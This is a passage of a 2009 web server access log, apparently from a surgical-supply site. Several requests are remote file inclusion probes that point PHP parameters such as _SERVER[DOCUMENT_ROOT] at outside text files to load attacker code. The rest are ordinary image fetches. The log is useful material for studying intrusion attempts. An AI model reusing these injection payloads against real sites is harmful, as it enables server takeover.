211.115.89.7 - - [23/Sep/2009:08:31:45 -0400] "GET /logs/access_log.Q109071600%20%20///?_SERVER[DOCUMENT_ROOT]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:45 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 200 18978 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:08:31:46 -0400] "GET /logs/access_log.Q109091500%20%20///?_SERVER[DOCUMENT_ROOT]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
147.46.13.159 - - [23/Sep/2009:08:31:55 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
147.46.13.159 - - [23/Sep/2009:08:31:55 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.85.158.51 - - [23/Sep/2009:08:32:02 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
67.85.158.51 - - [23/Sep/2009:08:32:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
67.85.158.51 - - [23/Sep/2009:08:32:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
67.85.158.51 - - [23/Sep/2009:08:32:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
211.115.89.7 - - [23/Sep/2009:08:32:08 -0400] "G